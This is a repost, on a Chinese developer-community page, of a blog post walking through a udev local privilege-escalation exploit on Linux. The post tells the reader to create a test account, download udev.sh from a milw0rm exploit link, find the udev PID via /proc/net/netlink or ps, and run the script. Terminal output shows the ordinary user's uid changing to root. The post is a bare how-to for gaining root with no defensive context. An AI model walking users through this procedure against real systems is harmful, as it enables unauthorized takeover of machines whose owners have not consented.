AI 助理
备案控制台
开发者社区 安全 文章 正文

udev漏洞,普通用户变root

2017-11-14 1020
版权
版权声明:
本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《 阿里云开发者社区用户服务协议》和 《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写 侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。
简介:
1. 在LINUX目录下建立test 帐户
2.下载udev.sh脚本 在 http://milw0rm.com/exploits/8478
3.查看UDEV的PID  
方法一:
先cat /proc/net/netlink 
ffff810077587400 15  364    ffffffff 0        0        0000000000000000 2
ffff810037f81000 16  0      00000000 0        0        0000000000000000 2
ffff810077078400 18  0      00000000 0        0        0000000000000000 2
那个364就是 UDEV的进程,如果出现很多不知道哪一个用方法2
方法二:
另外最好通过ps aux | grep udev获取pid 为365,然后再-1,把这个参数传给A脚本
然后在test 用户的当前目录 里
按以下步骤运行
[haha@localhost ~]$ id
uid=501(haha) gid=502(haha) groups=502(haha)
[haha@localhost ~]$sh udev.sh 364
suid.c: In function 'main':
suid.c:3: warning: incompatible implicit declaration of built-in function 'execl'
sh-3.1# id
uid=0(root) gid=0(root) groups=502(haha)
此时的UID 变为0了 ,test用户已经变为 ROOT用户

附件:http://down.51cto.com/data/2360882



    本文转自eyjian 51CTO博客,原文链接:http://blog.51cto.com/mooon/909417,如需转载请自行联系原作者



文章标签:
安全
技术小胖子
目录
相关文章
1508026077072612
|
API
使用 Visual Studio 开发 CS 的 BOF
使用 Visual Studio 开发 CS 的 BOF
1508026077072612
783 0
wljslmz
|
安全 编译器 Go
什么是 CGO?什么时候会用到它?
【8月更文挑战第31天】
wljslmz
1206 0
林中静月下仙
|
缓存 安全 关系型数据库
Mysql给root开启远程访问权限
MySql出于安全方面考虑默认只允许本机(localhost, 127.0.0.1)来连接访问,所以需要给root账户新增一个远程访问权限。
林中静月下仙
4233 0
Mysql给root开启远程访问权限
1508026077072612
|
API C++ Windows
「更新」Visual-Studio-BOF-template
「更新」Visual-Studio-BOF-template
1508026077072612
281 1
1508026077072612
|
编译器 C语言 C++
聊聊Cobalt Strike 4.1的 BOF
聊聊Cobalt Strike 4.1的 BOF
1508026077072612
404 0
1508026077072612
|
XML 安全 C++
Windows RPC之MS-TSCH添加计划任务
Windows RPC之MS-TSCH添加计划任务
1508026077072612
1239 0
亿人安全
|
存储 算法 安全
Cobaltstrike4.0 —— shellcode分析(二)
Cobaltstrike4.0 —— shellcode分析
亿人安全
371 0
啵啵肠
|
安全 Java 编译器
如何用 Go 调用 Windows API | 青训营笔记
如何用 Go 调用 Windows API | 青训营笔记
啵啵肠
1386 0
Gcow安全团队
|
网络安全 Windows
横向移动工具开发:wmiexec-Pro(二)
早于两年前,我基于wmihacker免杀横向的思路,造轮子写了个wmipersist-Modify.py的横向工具,相对于wmihacker来说,无需配合mimikatz的PTH,即可进行PTH
Gcow安全团队
756 0
技术小甜
|
关系型数据库 MySQL
mysql清空表的方法
技术小甜
5140 0

热门文章

最新文章

  • 1
    互联网大厂程序员岗位职级划分
  • 2
    【资料合集】红包在线技术峰会回顾集锦:讲义PDF+活动视频!
  • 3
    那些年,人们问王坚博士的33个问题
  • 4
    世界互联网大会发布15项领先科技成果
  • 5
    GNU make manual 翻译(十五)
  • 6
    SSRS 2012 聚合函数 -- 介绍
  • 7
    微软将停止免费提供15GB OneDrive空间
  • 8
    Node.js开发者必须熟悉的四个JavaScript概念
  • 9
    Harp – 内置常用预处理器的静态 Web 服务器
  • 10
    Sql Server内置函数实现MD5加密
  • 1
    基于C#实现的支持文件传输的Socket聊天室
    71
  • 2
    Gateway 网关坑我! 被这个404 问题折腾了一年?
    65
  • 3
    Service Mesh:原则、挑战和演变
    44
  • 4
    DDD领域驱动设计:实践中的聚合
    54
  • 5
    【详细教程】如何在Ubuntu上本地部署Dify?
    52
  • 6
    Dapr:用于构建分布式应用程序的便携式事件驱动运行时
    42
  • 7
    阿里云gpu云服务器收费价格,热门实例简介和最新按量、1个月、1年收费标准参考
    90
  • 8
    游戏显卡驱动,NVIDIA App ,0xc000007b,amd显卡驱动下载,解决游戏慢,游戏卡等问题
    60
  • 9
    基于python大数据的天气可视化分析预测系统
    58
  • 10
    AIRS/Aqua L1B 可见光/近红外 (VIS/NIR) 地理定位和校准辐射 V005 (AIRVBRAD) 在 GES DISC
    50

    • 相关电子书

    更多
  • 低代码开发师(初级)实战教程
  • 冬季实战营第三期:MySQL数据库进阶实战
  • 阿里巴巴DevOps 最佳实践手册
    • 下一篇
    蛋白质语言模型 ProGen:在实验室合成由 AI 预测的蛋白质